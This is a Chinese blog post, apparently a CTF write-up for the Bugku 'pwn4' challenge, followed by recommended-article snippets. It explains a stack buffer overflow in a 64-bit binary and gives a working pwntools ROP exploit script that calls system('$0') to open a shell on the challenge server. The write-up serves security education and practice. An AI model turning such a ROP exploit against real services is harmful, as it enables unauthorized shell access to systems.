bugku_pwn4 | by AriSan

最新推荐文章于 2020-12-21 18:57:26 发布
最新推荐文章于 2020-12-21 18:57:26 发布
阅读量219 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AriSan_XD/article/details/106483184
版权

bugku_pwn4 | by AriSan

checksec 发现为64位程序,而且没有打开任何保护
在这里插入图片描述
然后用ida看一下伪代码,嘿嘿,居然有一个 read 函数,明显的栈溢出。
在这里插入图片描述
gdb 在进入 read 之前下断点,观察此时 rbprsp 的值,得到栈空间大小为 0x70-0x60+8
在这里插入图片描述
继续ida可以发现很明显的 system 函数,但是却没有 "/bin/sh" ,所以 system 函数的参数需要我们自己传入,说到传参,这是一个64位的程序,而64位程序的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 中,如果还有更多参数才会保存在栈上,所以我需要找到一条汇编语句来改变 RDI 的值,从而改变传入的参数。

但是这个程序中没有像这样的函数提供来让我们传入 "/bin/sh" 这样的字符串。但是!这个程序中有个 $0 ,而 system('$0') 可以理解成与 system("/bin/sh") 的效果一样,所以我只需要改变 RDI 中的内容为这个 $0 的地址即可!

在这里插入图片描述

from pwn import *
p = remote('114.116.54.89', 10004)
#p = process('./pwn4')
pop_rdi = 0x00000000004007d3 
like_bin_sh = 0x000000000060111f
system = 0x000000000040075A
payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(like_bin_sh) + p64(system)  
p.recvuntil('Come on,try to pwn me')
p.sendline(payload)
p.interactive()
AriSan_XD
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Bugku CTF-MISC 1
afei001
02-25 446
目录 前言: 1.这是一张简单的图片:Unicode编码转换 2.又一张图片,还单纯吗:jpg中隐藏jpg 3.隐写:IHDR修改图片高度隐写 3.1 steg_Bugku-burstHeight.py 4.隐写2:隐写包含加密zip压缩包 4.1 binwalk分离文件 4.2 foremost分离图片 5.隐写3:IHDR修改图片高度隐写 5.1 steg_Bugku-burst_png_width_height.py 6.telnet:pcap数据包分析 7.Linux:二进制
Faster R-CNN Keras版源码史上最详细解读系列之RPN模型解析
王伟王胖胖的博客
09-18 1541
Faster R-CNN Keras版源码史上最详细解读系列之RPN模型解析源码里的RPN模型 源码里的RPN模型 源码中有RPN模型,其实囊括了前面的特征提取部分,我们先来看下,他这个模型的结构,我们才能明白输入输出是怎么来的,还是train_frcnn.py: # 图片维度顺序的改变 if K.image_dim_ordering() == 'th': input_shape_img ...
Kali Linux安全渗透
01-02
对Kali Linux安全渗透进行学习,有利于新人对linux核心如何运作有进一步了解
增量式PID仿真图
05-16
使用simulink做的,增量式PID仿真图,图片格式,早着做就行
Bugku-pwn4详解
Casuall的博客
07-14 4412
这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。 一个64位动态链接的程序,没有开什么保护。 然后用IDA打开,有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数 但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPg...
【从零开始学Mask RCNN】四,RPN锚框生成和Proposal生成
I good vegetable a!
06-27 2929
1. Mask RCNN Anchor 生成 Mask RCNN的锚框生成和SSD的锚框生成策略类似(SSD的锚框生成策略见:【资源分享】从零开始学习SSD教程) ,都遵循以下规则: Anchor的中心点的个数等于特征图像素个数 Anchor的生成是围绕中心点的 Anchor框的坐标最终需要归一化到0-1之间,即相对输入图像的大小 我们知道Faster RCNN只是在一个特征图上铺设Anchor,而Mask RCNN引入了FPN之后使用了多层特征,这样和SSD类似都是在多个特征图上铺设Anchor,不过
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
AVOD-代码理解系列(二)
weixin_41679651的博客
08-28 2293
AVOD-代码理解 AVOD代码理解第二篇,开始介绍网络结构的两大部分rpn和avod部分,在core文件下的avod_model.py和rpn_model.py部分分别是结构的主体,其间会交叉一些相应的处理部分!这篇先介绍网络的输入. 1 在avod_model.py的build开头,需要来自rpn_model的输出作为avod部分的输入. def build(self): ...
BugkuCTF pwn1 pwn2 pwn4 pwn5 pwn3 详细writeup【橘小白】
kety_gz的博客
09-03 9198
buku的pwn按照难度的顺序依次是pwn1,pwn2,pwn4,pwn5,pwn3 这些题目的libc pwn1 nc连接后直接就有执行权限 ls cat flag 得到flag pwn2 下载文件放入ida 有一个有shell,我们只需要将程序跳转到这里 选择main F5查看代码 看到这个s申请了0x30个字节,但是下边read了0x100字节,就造成了栈溢出,我们只要将返回地址溢出为...
Bugku pwn4
BengDouLove的博客
02-16 364
bugku pwn4 先ida打开elf文件,发现是64位,之前知道64位和32位有所不同但是还没有接触到过 程序里没什么,然后打开字符串子视图 有这么一句话,引起怀疑,然后双击点开,右键点开外部引用图表到 发现0x400751这个函数在调用这一段字符串,打开400751并且反汇编,发现是system函数,里面的参数正是这一段字符串,想到如果里面是系统指令就好了。 打开虚拟机,调试过程中也没有...
Mask RCNN 学习笔记
weixin_30917213的博客
04-07 412
下面会介绍基于ResNet50的Mask RCNN网络,其中会涉及到RPN、FPN、ROIAlign以及分类、回归使用的损失函数等 介绍时所采用的MaskRCNN源码(python版本)来源于GitHub:https://github.com/matterport/Mask_RCNN 下面的介绍都是基于这部分源码进行的(少数地方会和原始论文中有差别,不过不影响整个网络的理...
Bugku pwn2
、moddemod
05-26 432
pwn2 题目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
Pwn5-bugku
yeshen4328的专栏
10-11 216
pwn5 基础知识 格式化字符串漏洞: 在c/c++的格式化输出中,使用的是printf函数,它的参数如下所示: int printf(const char *format, ...); 使用方式如下: char buf[10] = {}; read(0,buf,9); printf("%s",buf); 如果直接使用printf输出buf的话,则存在格式化字符串漏洞: char buf[10] = {}; read(0,buf,9); printf("%s",buf); 原理:因为printf会
位图的光栅操作及ROP码解析
ChipArtist's Blogs
01-26 5486
位图的光栅操作及ROP码解析(SnowStart于2005年3月22日)位图是windows图形编程中非常重要的一个方面。在进行普通的位图操作中,如GDI函数BitBlt,StretchBlt, StretchDIBits,都会用到一个光栅操作码,即ROP码,像SRCCOPY,PATPAINT,SRCAND等,由于最近在开发图形驱动,涉及了许多的ROP2,ROP3和ROP4码的操作,对RO
rpn产生proposals_Faster-rcnn源码解析4
weixin_39825045的博客
12-21 233
我们已经训练出了rpn网络,下面利用训练好的rpn网络来生成proposals。下面来看一下rpn_generate函数:首先设置参数:然后得到一个pascal_voc类:imdb = get_imdb(imdb_name)加载训练的rpn网络:rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)然后得到生成的prop...
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值